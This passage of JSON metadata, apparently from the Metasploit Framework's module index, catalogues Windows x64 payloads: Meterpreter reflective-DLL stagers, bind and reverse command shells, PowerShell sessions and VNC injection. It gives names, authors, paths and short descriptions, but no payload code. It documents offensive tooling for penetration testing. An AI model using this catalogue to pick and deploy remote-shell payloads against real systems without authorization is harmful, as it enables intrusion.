"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support",
"full_name": "payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager",
"full_name": "payload/windows/x64/meterpreter/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"UserExistsError"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_tcp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager",
"full_name": "payload/windows/x64/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_http": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/x64/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_https": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/x64/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"agix",
"rwincey"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager",
"full_name": "payload/windows/x64/meterpreter/reverse_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-01 03:49:00 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_tcp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager",
"full_name": "payload/windows/x64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_tcp_rc4": {
"name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/x64/meterpreter/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"max3raza",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-04 17:43:15 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_winhttp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/x64/meterpreter/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_winhttps": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)",
"full_name": "payload/windows/x64/meterpreter/reverse_winhttps",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTPS (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_winhttps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_bind_named_pipe": {
"name": "Windows Meterpreter Shell, Bind Named Pipe Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"UserExistsError",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_bind_tcp": {
"name": "Windows Meterpreter Shell, Bind TCP Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_http": {
"name": "Windows Meterpreter Shell, Reverse HTTP Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_https": {
"name": "Windows Meterpreter Shell, Reverse HTTPS Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_ipv6_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)",
"full_name": "payload/windows/x64/meterpreter_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline x64",
"full_name": "payload/windows/x64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/powershell_bind_tcp": {
"name": "Windows Interactive Powershell Session, Bind TCP",
"full_name": "payload/windows/x64/powershell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/powershell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/powershell_reverse_tcp": {
"name": "Windows Interactive Powershell Session, Reverse TCP",
"full_name": "payload/windows/x64/powershell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/powershell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_ipv6_tcp": {
"name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager",
"full_name": "payload/windows/x64/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_ipv6_tcp_uuid": {
"name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support",
"full_name": "payload/windows/x64/shell/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_named_pipe": {
"name": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager",
"full_name": "payload/windows/x64/shell/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_tcp": {
"name": "Windows x64 Command Shell, Windows x64 Bind TCP Stager",
"full_name": "payload/windows/x64/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_tcp_uuid": {
"name": "Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/shell/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/reverse_tcp": {
"name": "Windows x64 Command Shell, Windows x64 Reverse TCP Stager",
"full_name": "payload/windows/x64/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/reverse_tcp_rc4": {
"name": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/x64/shell/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"max3raza",
"RageLtMan"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-04 17:43:15 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/x64/shell/reverse_tcp_uuid": {
"name": "Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/shell/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell_bind_tcp": {
"name": "Windows x64 Command Shell, Bind TCP Inline",
"full_name": "payload/windows/x64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn a command shell (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell_reverse_tcp": {
"name": "Windows x64 Command Shell, Reverse TCP Inline",
"full_name": "payload/windows/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a command shell (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_ipv6_tcp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager",
"full_name": "payload/windows/x64/vncinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_ipv6_tcp_uuid": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support",
"full_name": "payload/windows/x64/vncinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_named_pipe": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager",
"full_name": "payload/windows/x64/vncinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
"is_install_path": true,
